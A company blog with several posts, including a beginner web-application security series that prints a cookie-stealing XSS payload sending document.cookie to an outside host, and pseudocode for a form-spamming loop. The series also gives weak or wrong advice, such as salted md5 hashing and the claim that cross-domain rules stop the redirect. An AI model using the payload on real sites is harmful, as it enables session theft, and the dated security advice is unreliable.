Dog Boarding in Sweden

For the past couple of months, one of our teams has been working on an exciting project called Tasspass. Tasspass is a concatenation of two Swedish words, Tass and Pass: Tass means “paw” and Pass means “home”.

Screenshot from 2013-04-08 15:29:25

Tasspass is one of the very first dog boarding sites in Sweden. We developed the site from scratch, including the logo and website design.

We are glad to share the news that tasspass.se is launching today. We are very proud to be associated with Tasspass and firmly believe that it will do very well in the days to come. We wish them luck and success.

Happy (dog) boarding!!

Web Applications Security – Forms, when not well formed

The overwhelming response to part 1 of this series was awesome; lots of queries via Twitter and a bunch of good comments have encouraged me to write more frequently, and I am taking note of that. As promised, the solution to the query asked in part 1 follows:

In practice there will be many addresses and many things that you can pass on as a gift, and it would certainly be a better idea to do something like this:

// let us assume that the current user will send the gift as a deliverable to himself/herself
// we will address sending the gift to someone else in the upcoming days
if (isUserRegisteredWithAddress(address)) {
    // pass the request values themselves, not the literal strings "gift" and "address"
    performDelivery(gift, address);
}

We will continue toward better solutions throughout the series, but don’t hesitate to post yours right now.

Okay, let’s fasten our seat belts again for a fast-paced ride.

When I asked many developers which tag they think is the most important, most of them answered the <form> tag, because it is the thing that carries everything back and forth between the site and its users.

From a security standpoint the <form> tag is “the one” tag that needs to be taken care of the most. Let’s discuss the various security concerns with this element; later we will discuss various approaches to solving them.

1. Cross site scripting

The de facto well-known hack out there, using JavaScript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now a user comes along, enters his name as prady, and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take the reviews of a particular user to show them somewhere on your site. You tried to show prady’s reviews and what’s this? He got the cookies of other users. Your users are being compromised one way or another.

2. Spoofed form submission

Now, for the above form, someone can easily program bogus form submissions. That can be done by anyone, in any technology of his/her choice, something like this:

// initialize variables
name = "prady";
review = "review";
WHILE(1) {
    // initiate a new http request and repeatedly forge it
    request = 'http://yoursite.com/saveReview?name=' + name + '&review=' + review;
    name = randomize(name);
    review = randomize(review);
}

Your site will be overwhelmed with reviews in a very short period of time.

Fixing the problems

Let’s discuss a fix for the XSS attack. We can disallow the <script> tag by using regular expressions in our controller for saving new reviews. Most frameworks and CMSs do that for you; let them take care of this issue, for code reuse and better maintainability.

Now comes the forged form submission. Here we can include an encrypted form number in a hidden field of the form and save the same somewhere on the server; when the user submits the form, we can cross-check the validity of the form itself by matching the form number in the GET request against the stored ones on the server.

These are just some fixes to the problems; most of them are already taken care of, for example most browsers don’t allow cross-domain Ajax requests precisely because of XSS. So the script posted above will not work in modern browsers. Please post your solutions to the problems in the comments and stay tuned for the next post.
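As an added example (not the post’s code), here is a minimal Python SaveReview flow that applies both fixes: an unpredictable form number issued by the server, stored there and accepted only once, and output encoding when the reviews are displayed. It escapes on output instead of filtering <script> with a regular expression, since a blocklist of a single tag is easy to get around; the in-memory stores, the form_token field name and the switch to POST are assumptions.

```python
import html
import secrets

# Constructed in-memory stores standing in for the site's database and the
# server-side record of issued form numbers (assumption: example code only).
REVIEWS = []
ISSUED_FORM_TOKENS = set()

def issue_form_token():
    """Create an unpredictable form number and remember it on the server."""
    token = secrets.token_urlsafe(32)
    ISSUED_FORM_TOKENS.add(token)
    return token

def render_review_form():
    """The review form from above, now POSTed and carrying the hidden form number."""
    token = issue_form_token()
    return (
        '<form action="SaveReview" method="POST">'
        f'<input type="hidden" name="form_token" value="{token}">'
        'Your name: <input type="text" name="name">'
        'Your review: <input type="text" name="review">'
        '<input type="submit" value="Submit">'
        '</form>'
    )

def save_review(params):
    """SaveReview controller: accept only submissions carrying a valid, unused token."""
    token = params.get("form_token", "")
    if token not in ISSUED_FORM_TOKENS:
        return False                      # forged or replayed submission: dropped
    ISSUED_FORM_TOKENS.discard(token)     # single use, so the WHILE(1) loop cannot reuse it
    REVIEWS.append({"name": params.get("name", ""), "review": params.get("review", "")})
    return True

def render_reviews():
    """Show stored reviews with output encoding: prady's <script> becomes plain text."""
    return "".join(
        f"<p><b>{html.escape(r['name'])}</b>: {html.escape(r['review'])}</p>"
        for r in REVIEWS
    )
```

Marking the session cookie HttpOnly keeps document.cookie from reading it, which is the simplest defense against the cookie-stealing script above even when escaping is missed somewhere.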

See you soon.

Dynamic Forms with Drupal 7 FAPI and form states

When it comes to fast-paced delivery with better-managed things, nothing beats a Content Management Framework. Yes, there are a few others out there, but the king, Drupal 7, is still far better than its counterparts because of the de-normalized structure of its underlying database and the best-ever flexibility of taxonomies and relations. The last few days for one of our teams working on Drupal 7 were really challenging, and I really could not resist logging our learnings here, so here we go!

Okay, let me first tell you what we were expected to do:

Dynamic loading of multiple fields of a form based on the selected fields

Having implemented dependent dropdowns recently, we were aware that D7 respects Ajax a lot.

As usual we headed towards the Examples module, where we found the following code:

$form['dropdown_first'] = array(
  '#type' => 'select',
  '#title' => 'Instrument Type',
  '#options' => $options_first,
  '#default_value' => $selected,
  '#ajax' => array(
    'callback' => 'ajax_example_dependent_dropdown_callback',
    'wrapper' => 'wrap',
  ),
);

$form['dropdown_second'] = array(
  '#type' => 'select',
  '#title' => $options_first[$selected],
  '#prefix' => '<div id="wrap">',
  '#suffix' => '</div>',
);

In the above code, on selection of dropdown_first, dropdown_second gets its values from the server via an Ajax request, which replaces the elements inside ‘wrap’. We thought: what if we put this wrapper around the whole form element? We dug into that, and a comment on this D7 node turned out to be a real catalyst.

We tried the following and were sailing in a short period of time:

// *1 and *2 make the form dependent on the selected solution area
// *1 -- define properties for the solution area field
$form['field_select_a_solution_to_revie']['und']['#ajax'] = array(
  'event' => 'autocompleteSelect',
  'wrapper' => 'wrapper-vendor-review',
  'callback' => 'solution_area_selected_ajax_callback',
  'method' => 'replace',
);

// *2 -- define properties for the form
$form['#prefix'] = '<div id="wrapper-vendor-review">';
$form['#suffix'] = '</div>';

And below is some of the code that we used in solution_area_selected_ajax_callback():

// wipe the submitted input and ask FAPI to build the form afresh
$form_state['input'] = array();
$form_state['rebuild'] = TRUE;
// drupal_rebuild_form() declares $form_state by reference in its signature,
// so it must not be passed with & at the call site
$empty_form = drupal_rebuild_form('comment_node_vendor_profile_form', $form_state, NULL);
// keep the term the user just picked in the rebuilt form
$empty_form['field_select_a_solution_to_revie']['und']['#value'] = taxonomy_term_load($tid)->name;
return $empty_form;

This was only a peek at how to achieve multi-field dependency in Drupal. There are more exciting ways in which FAPI and form states prove their real power; it depends on how we exploit them. As a small bonus, I am soon going to write on achieving transitive dependency between different fields in Drupal forms. Stay tuned!

Our handle on Twitter is @sopantech; see you there.

Web Applications Security – Introduction

As a matter of fact we all make mistakes. Some of us learn from them and others just ignore them. But when it comes to the web applications that we develop, there is no room for mistakes, because our mistakes can cause a huge loss of business and in some cases loss of life! Here mistakes refer to architectural mistakes, UX mistakes and many others. But the most prominent ones are mistakes made in security, leaving loop-holes that can be used by others to harm your application. Being on the web means being open to everyone; leaving the gates open there means you are inviting everyone.

When I started writing this blog I wanted to cover an overview of web application security in a single blog post, but as you know security is a vast subject and can’t be covered in a single post, so I decided to divide this into a blog series. So, here comes the first.

For the upcoming posts you can subscribe to our blog. I know you are a social animal; that’s why we are on Facebook, so like us there and stay connected. For the tweeples, a bonus: @sopantech

So you, as a developer, think that you need to develop things that work. Better think of it this way from now on: “I develop things that work only under certain conditions”. Okay, enough said; now imagine your web application is being hacked. What to do next? Do you have something in backup? No... Now here comes rule 1:

Have a backup plan

Whether or not you have a backup plan, have one now. Who knows, your application may just sink when you test against it the different vulnerabilities that we are going to discuss in the upcoming days. I have three types of user in my web application: one can do this, another can do that... but the one can do this also... wait a minute. Look at rule 2:

Least Privilege

Give users no more than what they actually need. If a user is meant only for data entry, what is the use of giving him/her privileges for viewing past data? They may get all the past data and misuse it. Data is valuable.

Minimum Exposure

Yes, data is valuable; don’t show it all. Important information like credit card numbers and passwords must be given due care. Saving passwords hashed with the md5 algorithm with a salt added gives another layer of security when people with wrong intentions compromise your database.

Trade-off between usability and security

The trade-off between space and time is well known, but when it comes to security, smart decisions are to be taken to keep usability at good levels.

Don’t correct any data

If a user is passing data, force them to provide correct data rather than correcting it. For example, you don’t want to give any user access to the parent directory. So you replaced “..” with “.”, but what if someday a hacker puts in “...”?
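As an added example (not the post’s code), the two approaches side by side in Python: correct_path() is the replace-“..”-with-“.” fix, which turns “...” right back into “..”, while validate_path() resolves the supplied path under a base directory and rejects anything that ends up outside it. BASE_DIR and both function names are assumptions.

```python
import os

# Constructed example directory that user-supplied paths must stay inside.
BASE_DIR = "/var/www/uploads"

def correct_path(user_path):
    """The post's 'correct it' approach: replace every '..' with '.' and hope.

    str.replace() scans left to right without overlapping, so the three-dot
    input '...' becomes '.' + '.' == '..', the exact string it meant to remove.
    """
    return user_path.replace("..", ".")

def validate_path(user_path):
    """The 'force them to provide correct data' approach.

    Join the input to BASE_DIR, normalise it (collapses every '..'), and
    reject it if the result is not still under BASE_DIR. Returns the safe
    absolute path, or None when the request must be refused rather than fixed.
    """
    candidate = os.path.normpath(os.path.join(BASE_DIR, user_path))
    # os.path.join discards BASE_DIR entirely when user_path is absolute,
    # so the commonpath check also catches inputs like '/etc/passwd'.
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate
```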

It’s all about connections

Most security breaches are found where some ‘connection’ exists between two entities. These entities can be client and server, database and application, or an API and the clients accessing it. Let’s have an example. Suppose you have a form:

<form action="deliverGift" method="GET" name="myform">
<select name="gift">
<option value="watch">Watch</option>
<option value="popcorns">Popcorns</option>
<option value="sandwitch">Sandwitch</option>
</select>
<input type="hidden" name="address" size="25" value="heaven on earth" />
</form>

… and somewhere in deliverGift you wrote performDelivery(gift, address); but the story doesn’t end here. What if the user makes a spoofed HTTP GET request of the form:

/deliverGift?gift=keyboard&address=usa

In such a case your application will end up delivering a keyboard to usa, which you certainly don’t want! A cure to this problem is:

// updated code: compare against the form's own option values and pass the variables on
if (gift == "watch") {
    performDelivery(gift, address);
}
if (gift == "popcorns") {
    performDelivery(gift, address);
}
if (gift == "sandwitch") {
    performDelivery(gift, address);
}

or you can go with some switch-case construct.

That would work fine. But better use the following code:

if (gift == "watch" || gift == "popcorns" || gift == "sandwitch") {
    performDelivery(gift, address);
}

But it’s not over: you are leaving a loop-hole for a wrong address!

Please try to solve it yourself and post your solution in a comment. The solution will be included in the next blog post.
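Carrying the checks through, as an added example (not the post’s code): a Python deliverGift handler that accepts only gifts from the form’s own option values and only an address the logged-in user has registered, which is the fix the follow-up post (Forms, when not well formed) proposes for the wrong-address loop-hole. The user table, the current_user argument and the snake_case names are assumptions.

```python
# Exactly the <option> values of the form; anything else ("keyboard") is refused.
ALLOWED_GIFTS = {"watch", "popcorns", "sandwitch"}

# Constructed user table: the address a user may ship to is the one they
# registered, never the one the request happens to carry.
REGISTERED_ADDRESSES = {
    "prady": {"heaven on earth"},
}

# Constructed stand-in for the shipping back end.
DELIVERIES = []

def is_user_registered_with_address(user, address):
    """The isUserRegisteredWithAddress() check from the follow-up post."""
    return address in REGISTERED_ADDRESSES.get(user, set())

def perform_delivery(gift, address):
    DELIVERIES.append((gift, address))

def deliver_gift(current_user, params):
    """Handle /deliverGift?gift=...&address=... on behalf of the logged-in user.

    Returns True when a delivery was scheduled, False when the request was
    rejected; the request is refused, not corrected.
    """
    gift = params.get("gift", "")
    address = params.get("address", "")
    if gift not in ALLOWED_GIFTS:
        return False                      # spoofed gift value
    if not is_user_registered_with_address(current_user, address):
        return False                      # spoofed or someone else's address
    perform_delivery(gift, address)       # the variables, not the literal strings
    return True
```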

Code4it Moments

We managed to capture a couple of moments from today’s super hectic Code4it event. The event was a great success; each and every demo was full of ‘wow’ moments. But there can be only one winner, and the winners for season 1 of the Code4it event were the chmod 777 team (Pradeep and Gaurav). Congratulations to both!!

First edition of Code4it kicked off!

Code4it, as the name suggests, is a quarterly hack event at Sopan Technologies, which is kicking off today. Going forward, we plan to conduct the event on the first Saturday of every quarter. The rules are simple: everyone in the organization can participate, and at the end of the day they need to come up with a prototype (or a functional app, if possible) based on an original, novel and innovative idea. People can participate either as teams (max 2 members in a team) or individually.

At the end of the day, each team/participant needs to give a demo of what they have built. All other participants rate the “app” on a scale of 10 without disclosing the score to anyone. Once the demos are complete, we’ll pick 1-3 individuals/teams based on the scores. Essentially no team would end up with a “first” or “last” rank.

We are excited to see that everyone has participated enthusiastically in the event, and right now everyone is busy coding furiously. Loving it! Will update the blog with event pictures later on.

Happy New Year 2013!

On behalf of Sopan Technologies team, I wish you all a very happy and prosperous new year 2013.

2012 has been a great year and we hope that 2013 will be even more exciting. We plan to add a lot more offerings to our existing services, like mobile apps, mobile data collection and reporting tools, apart from a couple of cool products.

We would like to take this opportunity to thank all our clients and partners for their kind support and trust. Have a great year ahead.

Down the memory lane: From SopanTech to Sopan Technologies

While searching for some files, I found old logos of the company. Though these old logos are of practically no use now, I still remember how much effort we spent on creating them. It wouldn’t be wrong to say that they are still very close to our heart, as much as the current logo. And it’s not just the logo: our company name also went through changes with each logo.

SopanTech (2008)

This was the first company logo, and the company was founded with the name SopanTech.

First Logo

SopanTech Solutions (2009)

This was the second logo, and with it the name of the company was changed from just SopanTech to SopanTech Solutions.

Second Logo

Sopan Technologies (2010)

And then we revised the logo again, along with the company name. The company was finally legally registered in 2010, but the change in company name was not intentional. We were trying to get the company registered as SopanTech Solutions; however, due to some issues we didn’t get that name and had to go with our second option, which was Sopan Technologies. Later we realized that Sopan Technologies in fact represents our services in a more meaningful way.

Current Logo

P.S. – The word Sopan is a Sanskrit word which means “Step”. As far as we are concerned, it means a step towards success. Cheers!!

Diwali Celebration

Diwali celebration in the office. Incidentally, it was Kanchan’s birthday, so it was a double blast!!!
